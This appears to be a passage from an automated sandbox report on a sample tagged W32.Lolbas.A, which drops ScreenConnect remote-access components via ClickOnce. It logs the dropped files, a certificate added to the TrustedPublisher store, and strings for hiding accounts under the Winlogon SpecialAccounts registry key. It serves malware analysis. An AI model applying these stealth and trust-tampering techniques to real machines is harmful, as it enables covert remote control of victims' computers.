                  Source: Binary string: C:\Windows\ScreenConnect.ClientService.pdbpdbice.pdbt]yw source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: symbols\dll\mscorlib.pdbLb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831984228.00000000056AB000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BEEA8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1871561986.0000000002592000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: creenConnect.Core.PDBDL33 source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WER494D.tmp.dmp.13.dr
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.ClientService.dll.1.drStatic PE information: 0xC5B9CEDE [Wed Feb 13 13:04:30 2075 UTC]
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_00621000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00621000
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: real checksum: 0x14df5 should be: 0x16eed
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_00621BC0 push ecx; ret 0_2_00621BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3D92D2A5 pushad ; iretd 1_2_00007FFC3D92D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA5D2B5 push ds; iretd 1_2_00007FFC3DA5D42F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA47D00 push eax; retf 1_2_00007FFC3DA47D1D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA51D45 push 1BE95F14h; retn 000Ch1_2_00007FFC3DA51CF2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA4A645 push esi; ret 1_2_00007FFC3DA52507
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA524B9 push esi; ret 1_2_00007FFC3DA52507
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA5A492 push ss; retf 1_2_00007FFC3DA5A494
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA4A6B8 push esi; ret 1_2_00007FFC3DA52507
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA4A6BD push esi; ret 1_2_00007FFC3DA52507
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA400BD pushad ; iretd 1_2_00007FFC3DA400C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA4842E pushad ; ret 1_2_00007FFC3DA4845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA4845E push eax; ret 1_2_00007FFC3DA4846D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DA62E40 pushad ; ret 9_2_00007FFC3DA62E73
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DA78071 pushad ; retf 9_2_00007FFC3DA7809D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DA63FF2 pushad ; iretd 9_2_00007FFC3DA63FF3
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DA630B2 pushad ; iretd 9_2_00007FFC3DA630B3
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DA600BD pushad ; iretd 9_2_00007FFC3DA600C1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DA7842E pushad ; ret 9_2_00007FFC3DA7845D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DA7845E push eax; ret 9_2_00007FFC3DA7846D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DD52C95 push es; retf 9_2_00007FFC3DD52CF7
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9b66cfe0ceec305\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..dows_4b14c015c87c1ad8_0018.0004_none_5818e70d39ed8031\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..core_4b14c015c87c1ad8_0018.0004_none_53a10f2bfd9f6d01\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..vice_4b14c015c87c1ad8_0018.0004_none_04f4a774935ed06c\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exeJump to dropped file
                  Source: ScreenConnect.ClientService.dll.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Contains functionality to hide user accounts
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1871815455.00000000029EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1871339597.0000000000ED0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.exe, 0000000A.00000002.1832015455.00000000056C2000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831463096.0000000004FC2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
